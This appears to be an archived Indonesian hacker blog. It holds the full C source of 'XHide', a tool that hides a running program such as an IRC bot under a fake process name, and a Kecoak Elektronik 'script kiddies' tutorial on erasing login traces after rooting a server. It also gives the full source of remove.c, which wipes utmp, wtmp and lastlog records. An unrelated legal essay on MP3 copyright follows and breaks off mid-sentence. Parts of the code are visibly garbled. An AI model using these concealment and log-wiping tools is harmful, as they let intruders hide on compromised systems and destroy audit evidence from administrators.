Redemption for Remedy

Process Faker

2008-02-26T15:01:00.000+07:00

/*
/* Example : ./xhide -s "klogd -m 0" -d -p test.pid ./egg bot.conf
/*

#include
#include
#include
#include
#include
#include
#include
#include

void usage(char *progname);

int changeown (char *str) {
char user[256], *group;
struct passwd *pwd;
struct group *grp;
uid_t uid;
gid_t gid;
memset(user, '\0', sizeof(user));
strncpy(user, str, sizeof(user));
for (group = user; *group; group++)
if (*group == ':') {
*group = '\0';
group++;
break;
}
if (pwd = getpwnam(user)) {
uid = pwd->pw_uid;
gid = pwd->pw_gid;
} else uid = (uid_t) atoi(user);
if (*group)
if (grp = getgrnam(group)) gid = grp->gr_gid;
else gid = (gid_t) atoi(group);
if (setgid(gid)) {
perror("Error: Can't set GID");
return 0;
}
if (setuid(uid)) {
perror("Error: Can't set UID");
return 0;
}
return 1;
}

char *fullpath(char *cmd) {
char *p, *q, *filename;
struct stat st;
if (*cmd == '/')
return cmd;
filename = (char *) malloc(256);
if (*cmd == '.')
if (getcwd(filename, 255) != NULL) {
strcat(filename, "/");
strcat(filename, cmd);
return filename;
} else
return NULL;
for (p = q = (char *) getenv("PATH"); q != NULL; p = ++q) {
if (q = (char *) strchr(q, ':'))
*q = (char) '\0';
snprintf(filename, 256, "%s/%s", p, cmd);
if (stat(filename, &st) != -1
&& S_ISREG(st.st_mode)
&& (st.st_mode&S_IXUSR || st.st_mode&S_IXGRP || st.st_mode&S_IXOTH))
return filename;
if (q == NULL)
break;
}
free(filename);
return NULL;
}

void usage(char *progname) {
fprintf(stderr, "XHide - Process Faker, by Schizoprenic "
"Xnuxer Research (c) 2002\n\nOptions:\n"

"-s string\tFake name process\n"
"-d\t\tRun aplication as daemon/system (optional)\n"
"-u uid[:gid]\tChange UID/GID, use another user (optional)\n"
"-p filename\tSave PID to filename (optional)\n\n"

"Example: %s -s \"klogd -m 0\" -d -p test.pid ./egg bot.conf\n\n",progname);
exit(1);
}

int main(int argc,char **argv) {
char c;
char fake[256];
char *progname, *fakename;
char *pidfile, *fp;
char *execst;
FILE *f;
int runsys=0, null;
int j,i,n,pidnum;
char **newargv;
progname = argv[0];
if(argc<2)>
for (i = 1; i <>
if (argv[i][0] == '-')
switch (c = argv[i][1]) {
case 's': fakename = argv[++i]; break;
case 'u': changeown(argv[++i]); break;
case 'p': pidfile = argv[++i]; break;
case 'd': runsys = 1; break;
default: usage(progname); break;
} else break;
}
if (!(n = argc - i) || fakename == NULL) usage(progname);
newargv = (char **) malloc(n * sizeof(char **) + 1);
for (j = 0; j <>
newargv[j] = NULL;
if ((fp = fullpath(newargv[0])) == NULL) { perror("Full path seek"); exit(1); }
execst = fp;
if (n > 1) {
memset(fake, ' ', sizeof(fake) - 1);
fake[sizeof(fake) - 1] = '\0';
strncpy(fake, fakename, strlen(fakename));
newargv[0] = fake;
} else newargv[0] = fakename;
if (runsys) {
if ((null = open("/dev/null", O_RDWR)) == -1) {
perror("Error: /dev/null");
return -1;
}
switch (fork()) {
case -1:
perror("Error: FORK-1");
return -1;
case 0:
setsid();
switch (fork()) {
case -1:
perror("Error: FORK-2");
return -1;
case 0:
umask(0);
close(0);
close(1);
close(2);
dup2(null, 0);
dup2(null, 1);
dup2(null, 2);
break;
default:
return 0;
}
break;
default:
return 0;
}
}
waitpid(-1, (int *)0, 0);
pidnum = getpid();
if (pidfile != NULL && (f = fopen(pidfile, "w")) != NULL) {
fprintf(f, "%d\n", pidnum);
fclose(f);
}
fprintf(stderr,"==> Fakename: %s PidNum: %d\n",fakename,pidnum);
execv(execst, newargv);
perror("Couldn't execute");
return -1;
}

Siapa Saya?

2007-07-06T11:59:00.000+07:00

Aku Bukanlah seorang yang bisa segalanya, yang bisa mengerjakan segala hal, aku juga bukan orang yang bodoh yang hanya menerima apa adanya, tanpa bertanya dan tanpa menyelidiki apakah itu.

Aku adalah seorang yang haus akan informasi-informasi, bukan berarti aku haus akan kasih sayang, dan haus akan segala kegemerlapan dunia.

Aku hanyalah manusia yang memiliki banyak kekurangan dan banyak ke-khilafan, yang slalu dekat dengan dosa-dosa.

Hapus Jejak UNIX

2007-06-19T13:40:00.001+07:00

Terbitan Online Kecoak Elektronik
http://k-elektronik.org

============================================================
Bagaimana menghapus jejak
Script Kiddies Tutorial
(c) cbug aka CyberBug (Kecoak Elektronik)
============================================================

Pemberitahuan :
1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa
 saja yang ingin mengembangkan pengetahuan networking/internet mereka.
2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikel
 ini.
3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penulis
 eksploit/script dengan harapan pembaca juga tetap menyertakan kredit
 untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script
 dengan nama anda dengan harapan nanti dianggap hacker.

A. Apa yang harus ada

1. Server yang berhasil di root
 Terserah mo pake apa, boljug pake contoh eksploit pada artikel saya
 sebelumnya, pake remote eksploit juga boleh :P

2. Program penghapus Log
 Ada banyak dan bermacam-macam program penghapus log, pilih apa yang
 menurut kamu bagus dan cocok buat kamu, untuk langkah awal kamu bisa
 coba gunakan remove.c dari Simple Nomad.


B. Menghapus jejak

Nah ... kamu sudah dapat akses root, asyiiik ... tapi eh nanti dulu,
gimana kalo adminnya tau?, gak ... dia gak bakalan tau, kalau kamu pake
program penghapus log untuk menghilangkan jejak kamu.
Caranya? ... download remove.c dari site k-elektronik, kemudian compile
di mesin sasaran kamu, baca dulu baik2 cara compile nya di source remove.c
BTW ... remove harus di running sebagai root (untuk latihan, bisa saja
kamu login root di mesin kamu sendiri).

a. Perlu diperhatikan bagian berikut ini :

#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/adm/wtmp"
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"
#endif

Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada
posisi yang sama, misalnya distro Slackware menaruh file2 tsb diatas di:
#define WTMP "/var/log/wtmp"
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"

Jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah
sesuai dengan source remove.c

Kamu bisa gunakan perintah :
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
atau
whereis wtmp
whereis utmp
whereis lastlog
Kemudian ganti posisi file2 tersebut di remove.c sesuai dengan hasil
diatas.

b. Kita compile sekarang? ... ayooooooooooooo.

kecoak:/home/cbug/tools# gcc remove.c -o remove -DGENERIC
remove.c: In function `main':
remove.c:50: warning: return type of `main' is not `int'
/tmp/ccZVzySI.o: In function `main':
/tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should
not be used.

Waw ... ada warning message ... gak apa2, warning bukan error :P


c. Cek last login nya user (cbug misalnya)

kecoak:/home/cbug/tools# lastlog | grep cbug
cbug             tty2                      Sat Mar 11 11:32:42 -0800 2000


d. Jalankan remove

kecoak:/home/cbug/tools# ./remove cbug

REMOVE by Simple Nomad
Nomad Mobile Research Centre (c) 1997

Found 549 record(s) for user cbug
Will attempt a lastlog cleanup by default.

#    - remove last # records from utmp/wtmp
a    - remove (a)ll records from utmp/wtmp
q    - (q)uit program

Enter selection ->


e. Hapus record terakhir (ketik #), atau boleh juga semua (a) :P

Enter selection -> #
REMOVE cleaned up 0 record(s) from /var/log/wtmp
REMOVE cleaned up 0 record(s) from /var/run/utmp
REMOVE cleaned up /var/log/lastlog


f. Cek last log nya cbug

kecoak:/home/cbug/tools# lastlog | grep cbug
cbug                                       **Never logged in**


g. Ini hasilnya kalo cbug login :

Selamat datang di sarang Kecoak Elektronik

kecoak login: cbug
Password:
Kecoak's K-Rad OS
No mail.

kecoak:~$


h. Biasanya kalo last log nya dicatat (belum/gak dihapus) cbug bisa liat
 gini, (perhatikan bagian Last login nya) :

Selamat datang di sarang Kecoak Elektronik

kecoak login: cbug
Password:
Kecoak's K-Rad OS
Last login: Sat Mar 11 12:06:02 -0800 2000 on tty3.
No mail.

kecoak:~$

i. Gitu aja

--
Manado, Awal Maret 2000
cbug

Hapus Jejak .C

2007-06-19T13:38:00.000+07:00

/*
REMOVE       -- February 26, 1999
Simple Nomad -- Nomad Mobile Research Centre

Universal utmp, wtmp, and lastlog editor. Actually
removes, doesn't leave holes...

Compile "cc -o remove remove.c -DGENERIC" and run
as root. Use -DAIX instead of -DGENERIC for an AIX
machine. Use -DSCO instead of -DGENERIC for a SCO
machine.
*/

#include 
#include 
#include 
#include 
#include 
#ifndef AIX
#include 
#else
#include 
#endif
#include 

#ifdef AIX
#define WTMP "/var/log/wtmp"
#define UTMP "/etc/utmp"
#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */
/* handled a bit differently.   */
char LogParam[7][30]=
{
"time_last_login=","tty_last_login=","host_last_login=",
"unsuccessful_login_count=","time_last_unsuccessful_login=",
"tty_last_unsuccessful_login=","host_last_unsuccessful_login="
};
#endif
#ifdef SCO
#define WTMP "/etc/wtmp"   /* wtmp was here on the SCO box I accessed */
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
#endif
#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/log/wtmp"
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
#endif

void main(argc,argv)
int  argc;
char *argv[];
{
int cleanWtmp(char *,int);
int cleanUtmp(char *,int);
int cleanLastlog(char *);
int getCount(char *,char *);
char line[10];
int killem, firstcnt, t;

if(argc!=2)
{
printf("Usage: %s acct\n",argv[0]);
exit(0);
}
firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */
printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1999\n\n")
;
printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);
printf("Will attempt a lastlog cleanup by default.\n\n");
printf("#    - remove last # records from utmp/wtmp\n");
printf("a    - remove (a)ll records from utmp/wtmp\n");
printf("q    - (q)uit program\n\n");
printf("Enter selection -> ");
gets(line);
if(line[0]==0x51 || line[0]==0x71) exit(0);
if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;
else killem=atoi(line);
if (killem>firstcnt)
{
printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);
exit(-1);
}
t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */
if (t==1) {
printf("Trouble cleaning up %s.\n",WTMP);
exit(-1);
} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);
t=cleanUtmp(argv[1],killem);
if (t==1) {
printf("Trouble cleaning up %s.\n",UTMP);
exit(-1);
} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);
t=cleanLastlog(argv[1]);    /* Make our attempt at lastlog */
if (t==1) {
printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);
}
printf("REMOVE cleaned up %s\n",LASTLOG);
} /* end main */

int getCount(fname,acct) /* Go check wtmp and find out how many records */
char *fname, *acct;
{
struct utmp utmp_ent;
int f,cnt=0;

if((f=open(fname,O_RDWR))>=0){
while(read(f,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct
,strlen(acct)))cnt++;
}
close(f);
return(cnt);
} /* end getCount */

int cleanWtmp(acct,killem)
char *acct;
int killem;
{
struct utmp utmp_ent;
int fd,count=0;
if((fd=open(WTMP,O_RDWR))>=0){
while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct
,strlen(acct)))count++;
lseek(fd,0,SEEK_SET);
while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
  if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
    count--;
    if(count+1<=killem){          bzero((char *)&utmp_ent,sizeof(utmp_ent));          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);          write(fd,&utmp_ent,sizeof(utmp_ent));          killem--;        }      }    }    close(fd);  }  else return(1); } /* end cleanWtmp */  int cleanUtmp(acct,killem) char *acct; int killem; {  struct utmp utmp_ent;  int fd;  if((fd=open(UTMP,O_RDWR))>=0){
lseek(fd,0,SEEK_SET);
while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
  if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
    if(killem>0){
      bzero((char *)&utmp_ent,sizeof(utmp_ent));
      lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
      write(fd,&utmp_ent,sizeof(utmp_ent));
      killem--;
    }
  }
}
close(fd);
}
else return(1);
} /* end cleanUtmp */

int cleanLastlog(acct) /* The lastlog subroutine */
char *acct;
{
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */
int t,i;
char entry[200];
for (i=0;i<7;i++)>/dev/null",LASTLOG,acct,LogParam[i])
;
t=system(entry);
printf("Return code for %s is %d\n",LogParam[i],t);
}
#else  /* Normal binary lastlog cleanup */
struct passwd *pwd;
struct lastlog logit;
int f;
if((pwd=getpwnam(acct))){
if((f=open(LASTLOG,O_RDWR))>=0){
  lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
  bzero((char *)&logit,sizeof(logit));
  write(f,(char *)&logit,sizeof(logit));
  close(f);
}
}
else return(1);
#endif
} /* end cleanLastlog */

Analisis Permasalahan Hukum Terhadap Mp3

2007-06-19T13:32:00.000+07:00

Kecoak Elektronik Indonesia [ KEI ]
http://www.kecoak-elektronik.net

####################################################################
TOKET - Terbitan Online Kecoak Elektronik
Defending the classical hackers mind since 1995

Publisher : http://www.kecoak-elektronik.net
Contact   : staff@kecoak-elektronik.net
####################################################################

Subject   : Analisis Permasalahan Hukum Terhadap Mp3
Writer    : Ahmad Zakaria of Kecoak Elektronik
Contact   : zka@kecoak-elektronik.net
Style     : Unicode Transformation Format (UTF-8)

--[1]-- Kecoak Elektronik License

Kecoak Elektronik secara aktif mendukung Blue Ribbon Campaign.
Kami akan berusaha untuk menerbitkan semua informasi yang kami anggap
patut diketahui, baik dokumen teks, artikel majalah, atau surat kabar.
Seluruh kredit akan diberikan kepada sang pengarang.

Kecoak Elektronik tidak bertanggung jawab atas tindakan orang lain.
Informasi yang disajikan di situs ini adalah untuk tujuan pendidikan
dan informasionil belaka. Jika anda memutuskan untuk mengejawantahkan
dalam bentuk apapun informasi yang tersimpan di situs ini, anda
melakukan atas keputusan sendiri, dan tidak seorangpun selain anda
bertanggung jawab atas tindakan tersebut.

Dipersilahkan untuk mengambil sebagian atau seluruh dari isi artikel
yang kami terbitkan dengan tetap mencantumkan kredit atas pengarang
dan Kecoak Elektronik sebagai penerbit online. Artikel yang dikutip
atau diambil tidak dapat dipergunakan untuk kepentingan komersil.

--[2]-- Pendahuluan

MP3 adalah sebuah singkatan dari Motion Picture Expert Group, Layer 3
yang merupakan format encoding suatu data audio yang bertujuan untuk
mereduksi dan melakukan kompresi sejumlah data dalam audio tersebut,
namun tetap memiliki kualitas audio sama dengan yang tidak mengalami
kompresi.  Sebagai contoh, suatu data audio yang disimpan dalam format
lain membutuhkan space sebesar 50 megabyte, sedangkan apabila mengguna
kan format MP3, space yang dibutuhkan hanya seperlimanya saja, yaitu
sekitar 5 megabyte.

Faktor ukuran data dari MP3 yang hanya membutuhkan space yang sedikit
dari sebuah hardisk dan semakin maraknya diseminasi atau pertukaran
data di internet yang dipacu semakin tingginya kecepatan transfer data
di Internet, telah menyebabkan terjadi penyebaran data MP3 yang begitu
pesat. Penyebaran yang begitu pesat ini menimbulkan suatu isu penting
seputar MP3, yaitu aspek legalitas dari MP3 khususnya terkait dengan
hak cipta.

Sebagian besar konten MP3 adalah sebuah musik atau lagu. Lagu tersebut
biasanya berasal dari Compat Disk (CD) yang orisinil kemudian setelah
melalui proses grabbing, lagu tersebut di kompresi menggunakan encoding
software MP3 sehingga menjadi data MP3 yang biasanya berekstensi data
.mp3.  Rata-rata sebuah CD memuat sebelas hingga dua belas lagu dengan
total data sebesar 650 MB. Setelah melalui proses konversi menjadi MP3,
besar data masing-masing lagu berkisar antara lima hingga enam megabyte.
Setelah mencapai besaran yang terkompresi, data-data tersebut dengan
mudah dapat didistribusikan melalui internet. Data tersebut dapat di
distribusikan melalui surat elektronik (e-mail), melalui proses upload
ke server tertentu kemudian di-download, atau dapat juga melalui
pertukaran data orang perorang yang biasa disebut dengan peer-to-peer
networking.


--[3]-- Form dan Substance MP3

Pemahaman terhadap MP3 terlebih dahulu dimulai dari pemahaman mengenai
form atau bentuk dan substance atau isi dari MP3. Dilihat dari bentuknya,
MP3 adalah sebuah software atau perangkat lunak. MP3 dapat dikategorikan
secara bentuk sebagai software karena memiliki karakteristik sebuah
software, yaitu dibangun berdasarkan algoritma tertentu, menggunakan
suatu bahasa program (MP3 pertama kali ditulis menggunakan bahasa C),
dan telah melalui proses coding dan decoding sehingga dapat dikenali
oleh suatu operation system.  Dengan pemahaman MP3 sebagai software,
Thomson Consumer Electronics sebagai pemegang lisensi dari MPEG Layer
1, 2, dan 3, mematenkan software MP3 di negara yang mengakui adanya “software
patent” seperti United Stated of America dan Jepang.sSesungguhnyaMP3
dikatakan sebagai sebuah software karena MP3 menjalankan suatu fungsi
komputasi tertentu, yaitu melakukan konversi dan kompresi data audio dengan
encoding MP3 hingga dapat didengarkan menggunakan MP3 player seperti WinAmp
untuk platform windows da XMMS untuk platform *nix. Dengan dipatenkanya
MP3, tidak banyak pengembang software yang mau mengembangkan software
berbasis MP3, sehingga lahir beberapa software alternatif seperti Ogg,
dan WMA. Dengan demikian, MP3 secara form menjadi illegal di negara-negara
yang mengakui paten terhadap software, hingga berakhirnya waktu paten
pada 2010 dan paten menjadi public domain.

Dilain sisi, apabila memahami MP3 dari sudut pandang substansinya maka
pemahaman ini beranjak dari konten atau isi dari MP3 itu sendiri.
Seperti yang telah dijelaskan sebelumnya, konten atau isi dari MP3
adalah data audio yang umumnya merupakan musik atau lagu. Dengan
pemikiran ini, maka secara substantif MP3 adalah sebuah karya cipta
yang merupakan bagian dari Hak Cipta. Pemahaman terhadap bentuk dan
isi MP3 amat penting untuk menentukan aspek legalitas dari MP3 tersebut,
sehingga dapat diketahui kapan suatu MP3 merupakan data legal dan kapan
suatu MP3 dikatakan sebagai data illegal.

--[4]-- Aspek Legalitas MP3

Asosiasi Industri Rekaman Amerika (The Recording Industry Association
of America/RIAA) tengah menghadapi permasalahan dengan sebuah mesin
pencari (search engine) di Internet. Pada Maret 1998, Federasi
Internasional Industri Phonograph (the International Federation of the
Phonograph Industry/IFPI), sebuah asosiasi rekaman lain, mengajukan
gugatan terkait dengan perkara kriminal terhadap FAST Search and Transfer
ASA, sebuah search engine untuk pencarian MP3 yang berlokasi di Oslo.
Search engine ini memberikan sebuah links langsung ke file MP3 untuk
dapat diunduh secara langsung. FAST memberikan lisensi search engine
tersebut kepada Lycos, salah satu search engine terbesar yang berlokasi
di Amerika Serikat. Dilain kesempatan RIAA juga telah mengajukan
gugatan terhadap Lycos di Amerika Serikat. Laporan yang telah diajukan
IFPI hanya menyangkut tuduhan-tuduhan terhadap FAST yang merupakan
masalah pelanggaran hak cipta. Namun, selama tujuh bulan setelah laporan
tersebut diberikan, tidak terdapat gugatan atau laporan kriminal yang
diajukan.

Alasan yang paling dimungkinkan dengan tidak adanya tuntutan terhadap
Lycos atau FAST adalah terdapat sebuah klausula perjanjian yang menyatakan
search engine ini tidak memasukkan MP3 illegal kedalam database-nya.
Pada Maret 1999, ketika terjadi ancaman penuntutan, Lycos tidak
melakukan tindakan apapun terhadap perjanjian tersebut. Di sisi lain,
Altavista’s Photo & Media Finder, sebuah search engine yang dapat mencari
halaman-halaman khusus mengenai tipe-tipe multimedia termasuk MP3, telah
mengambil suatu tindakan untuk menghentikan hukum di atas. Pertama,
AltaVista memiliki kebijakan terhadap pelanggaran hak cipta yang tertulis
dalam website-nya; pada prinsipnya, perusahaan tersebut memberitahukan
kepada pengguna bahwa apa yang mereka unduh telah dilindungi hak cipta,
dan pengguna harus mendapatkan izin sebelum menggunakan apa yang mereka
unduh. Kedua, search engine memiliki tombol yang dapat digunakan
pengunduh untuk melaporkan apabila ada data yang terlarang, hal tersebut
memberikan hasil di site-nya bahwa data yang melakukan pelanggaran hak
cipta telah diblokir dari AltaVista. Ketiga, para pembuat website akan
menjaga website-nya agar tidak terlacak spider (sebuah software untuk
merekam jejakan data yang kemudian diberikan kepada database search
engine). Berdasarkan laporan tersebut, AltaVista akan menyaring data-
data yang illegal untuk meminimalisir tuntutan dari RIAA dan asosiasi
industri lainnya. Pada awalnya, Lycos tidak melakukan tindakan-tindakan
tersebut di atas, tetapi sejak dikeluarkannya kebijakan dan penyangkalan
dan ketika telah ditemukan cara untuk menemukan MP3 yang illegal, Lycos
melakukan tindakan di atas. Seperti semula, AltaVista tidak diancam dan
Lycos serta FAST telah menanggapi tuntutan yang diajukan terhadapnya,
tindakan ini mungkin sudah cukup untuk meredakan tuntutan. Dengan
menekan penyedia search engine, RIAA terlihat paling berusaha untuk
mencegah peredaran MP3 illegal dalam komunitas “bawatanah” internet dimana
data-data tidak mudah untuk diakses oleh pengguna biasa. Jika AltaVista
dan Lycos mengikuti janji mereka, tujuan RIAA akan tercapai dengan
efektif. Sepanjang MP3 yang illegal yang dapat ditemukan di search
engine dapat dihilangkan dengan cepat, search engine akan mampu
untuk mencegah penuntutan terhadap pelanggaran hak cipta.

Yang menarik, hukum Amerika Serikat dapat membenarkan penuntutan
terhadap hak cipta tersebut. Undang-undang Hak Cipta tahun 1976 tetap
mengenakan tanggung jawab kriminal, walaupun tanpa pelanggaran langsung;
bagi pihak yang mendukung pelanggaran tersebut dimungkinkan bertanggung
jawab lebih berat. Berdasarkan undang-undang tersebut, pihak yang
“diketahui dan diduga membantu atau besekongkol dalam pelanggaran hak
cipta dapat dikenakan hukuman pidana seperti yang berlaku bagi pelaku
utama”. Sebagai tambahan, undang-undang menetapkanbahwa sangat penting
terdakwa menghubungkan dirinya dalam beberapa cara usaha melakukan
tindakan kriminal dimana terdakwa tersebut ikut serta agar tujuan
tindakan kriminal tersebut dapat timbul, dan terdakwa tersebut mencari
cara-cara untuk membuatnya berhasil.” Laporan kriminal pada akhirnya
dapat diajukan terhadap search engine, hal tersebut akan sulit dalam
penuntutan yaitu pembuktian bukti yang penting. Dengan perkembangan
format MP3 yang sangat populer, tidak dapat dihindari kenyataan bahwa
search engine dapat menjadi hal yang bodoh dimana dalam kenyataannya
data-data MP3 adalah ilegal dan data-data yang ilegal tersebut tersedia
di search engine database. Di sisi lain, kelihatannya sebagian besar
search engine akan dapat menyebabkan keberhasilan tindakan kriminal.
Meskipun demikian, sebuah search engine tetap memiliki kesulitan dalam
mendeteksi apakah MP3 tersebut ilegal atau legal. Search engine tersebut
memfasilitasi salinan dan distribusi tersebut untuk menghasilkan uang
melalui peningkatan iklan dalam suatu situs. Sayangnya, gugatan yang
dapat menangani pelanggaran terhadap search engine dapat membawa
kesulitan yang sama seperti terhadap Rio: salah satu contoh search
engine, termasuk MP3, dimungkinkan memiliki mekanisme penggunaan tanpa
pelanggaran, contohnya distribusi yang mensahkan keberadaan MP3.
Beberapa pelanggaran lain akan dibutuhkan karena search engine mungkin
tidak melakukan suatu hal yang akan menjadi pelanggaran langsung,
seperti yang merujuk ke website lainnya. Beberapa kasus yang muncul di
Swedia memperlihatkan kecenderungan tersebut. Tommy Olsson, mahasiswa
swedia bersikap bahwa “dia mendukung pencurian musik dengan jaringan
yang terhubung dengan arsip MP3 illegal dari websitenya”. Olsson diklaim
bersalah oleh IFPI, organisasi yang sama dengan FAST yang digugat di
Norwegia. Pengadilan mungkin menemukan kesalahan pada Osslon dan
menetapkan ia bersalah atas pelanggaran hukum hak cipta, tetapi sejak
tuntutan tidak diajukan, pengadilan tidak dapat memutuskan bahwa ia
bersalah terhadap klaim tersebut. Namun, walaupun Olsson tidak secara
langsung melakukan pencurian musik, dia tetap harus bertanggung jawab.
Search engine pada dasarnya menunjukan fungsi yang sama seperti
Olsson—menyediakan jaringan. Terhadap Olsson, berdasarkan hukum
Amerika Serikat, tidak bertanggung jawab secara langsung tetapi dapat
dikenakan tanggung jawab terhadap pelanggaran hak cipta.

Dengan mengajukan gugatan pelanggaran hak cipta, RIAA akan mampu untuk
melindungi sebagian besar search engine gratis dari MP3 yang ilegal.
Bagaimanapun juga, hal tersebut sepertinya menunjukan bahwa RIAA
mungkin tidak akan mampu untuk menangkap beberapa search engine yang
lebih kecil, yang lebih khusus yang sama dengan website RIAA. Alasan
utama dari hal ini adalah kemampuan search engine untuk sering mengubah
alamat web untuk menghindari deteksi/pencarian. Hal terbaik yang dapat
dilakukan RIAA untuk memerangi pencurian ini adalah bersaing dengan
search engine. Banyak yang memercayai, popularitas MP3 dapat menyebabkan
reaksi yang kurang menarik terhadap RIAA dalam perubahan teknologi dan
permintaan konsumen.

Jika RIAA memiliki cara untuk menawarkan produknya dengan harga yang
pantas, tingkat popularitas dari MP3 ilegal akan menurun drastis.
Walaupun murah adalah lebih mahal daripada gratis, pencurian akan
selalu terlihat dalam beberapa bentuk, sebagian besar konsumen
walaupun mereka ikut melakukan pencurian, tetap ingin melakukan hal
yang legal. Namun, saat ini tidak banyak yang berkompetisi secara
legal. Jika konsumen menginginkan MP3 yang masuk dalam “Top 10 hit”
, atau musik-musik yang berasal dari band terkenal, konsumen akan
mendapatkannya dengan membeli CD musik tersebut atau mengunduh dari
MP3 ilegal karena tidak ada pilihan lain yang legal. MP3 yang legal
masih terbatas pada band yang tidak terkenal dengan beberapa
pengecualian. Dengan memberikan kemudahan untuk mencari legal copy
dengan harga yang wajar, sebagian besar konsumen mungkin akan memilih
untuk membeli barang yang legal. Kemajuan terjadi dalam munculnya ide
ini. RIAA datang dengan mengembangkan ide-ide untuk memasuki “electronik
download market”. Namun industri tersebut diharapkan menjadi industri
yang memiliki pengamanan lebih baik terhadap objek hak cipta. Industri
tersebut berusaha untuk bekerja dengan alternatif perlindungan hak
cipta MP3 yang disebut Secure Digital Music Initiative (SDMI).
Teorinya, SDMI akan memiliki kualitas suara yang lebih baik daripada
MP3 tetapi hanya dapat memberikan sedikit salinan untuk dibuat dalam
hasil yang telah diberikan hak cipta (copyrighted work). Namun
beberapa tahap dalam pengembangan, banyak insiders percaya bahwa
format SDMI akan lebih lambat dan tidak efisien, sulit untuk digunakan,
dan lebih mahal dari MP3. Jika kasusnya seperti itu, konsumen tidak
akan menyukainya, dan beberapa memprediksikan bahwa SDMI akan gagal.
Jika alternatif yang diberikan RIAA adalah untuk mencapai keberhasilan,
maka apa yang dihasilkan haruslah sama dengan apa yang dapat diberikan
MP3. Hal tersebut muncul bahwa RIAA masih berada dalam beberapa tahun
dari tercapainya tujuan tersebut, sehingga pada saatnya nanti, RIAA
akan berusaha untuk mengikuti cara sebelumnya yang telah dilakukan
untuk menghambat MP3.


--[5]-- Perlindungan Hukum Terhadap MP3 di Indonesia

Maraknya peredaran MP3 illegal di Indonesia telah mencapai taraf
yang menghawatirkan terhadap perkembangan investasi dibidang cakram
optik. Menurut Wakil Ketua Umum  Gabungan Pengusara Rekaman Indonesia,
Binsar Victor Silalahi, mengaku mengakhawatirkan maraknya VCD/DVD/
CD/MP3 lagu dan film bajakan. Berdasar catatan dia, dalam sebulan
sekurang pembajak mampu memproduksi delapan juta keping VCD/DVD/
CD/MP3 bajakan, “Ini akan berpengaruh terhadap investasi cakram optik.
Apalagi DVD/VCD porno dapat mengakibatkan kasus-kasus asusila di
masyarakat. Ini harus ditekan,'' jelasnya.

Awal perkembangannya, kualitas suara musik atau lagu yang asli
berbeda dengan kualitas lagu atau masik yang hasil bajakan. Namun
dengan adanya teknologi konversi digital seperti adanya MP3,
penurunan kualitas suara pada produk bajakan bisa diminimalisir,
bahkan kualitas suara produk bajakan setara dengan kualitas suara pada
CD orisinal.  Selain itu harga sebuah keping MP3 illegal (bajakan) jauh
lebih murah dari harga keping CD orisinal. Sebagai perbandingan, harga
suatu keping MP3 illegal yang mampu memuat lebih dari seratus lagu
berkisar lima ribu rupiah hingga sepuluh ribu rupiah, dibandingkan
dengan MP3 bajakan yang beredar dengan harga lima ribu rupiah perkeping.
Kedua faktor ini lah yang menyebabkan pembajakan MP3 di Indonesia
semakin marak. Untuk menekan laju pembajakan dan atau peredaran MP3
bajakan di Indonesia perlu adanya law enforcement yang kuat dan tegas
oleh aparat penegak hukum, Salah satunya melalui perlindungan terhadap
Hak Kekayaan Intelektual. Perlindungan terhadap MP3 dalam sudut pandang
hukum mengenai hak kekayaan intelektual khususnya hak cipta dapat
kembali dipandang dari dua sisi yaitu form dan substance-nya. Dari sisi
form-nya perlindungan hak cipta ditujukan pada MP3 sebagai software,
sehingga MP3 memenuhi unsur sebagai Program Komputer sebagaimana dimaksud
dalam Pasal 1 angka 8 Undang-undang Nomor 19 Tahun 2002 Tentang Hak
Cipta (UUHC) yaitu:

Program Komputer adalah sekumpulan instruksi yang diwujudkan dalam
bentuk bahasa, kode, skema, ataupun bentuk lain, yang apabila digabungkan  
dengan media yang dapat dibaca  dengan komputer akan mampu membuat
komputer bekerja untuk melakukan fungsi-fungsi khusus atau untuk mencapai
hasil yang khusus, termasuk persiapan dalam merancang instruksi-instruksi
tersebut. Dengan terpenuhinya unsur MP3 sebagai program komputer / software,
maka MP3 menjadi objek perlindungan dari hak cipta sebagaimana dimaksud
dalam Pasal 12 ayat (1) huruf a UUHC, yaitu:

Pasal  12
(1) Dalam Undang-undang ini Ciptaan yang dilindungi adalah Ciptaan
dalam bidang  ilmu pengetahuan, seni, dan sastra, yang mencakup:

a. buku, Program Komputer, pamflet, perwajahan (lay out) karya
   tulis yang diterbitkan, dan semua hasil karya tulis lain;

Ketentuan ini berbeda dengan ketentuan yang berlaku di Amerika, dimana
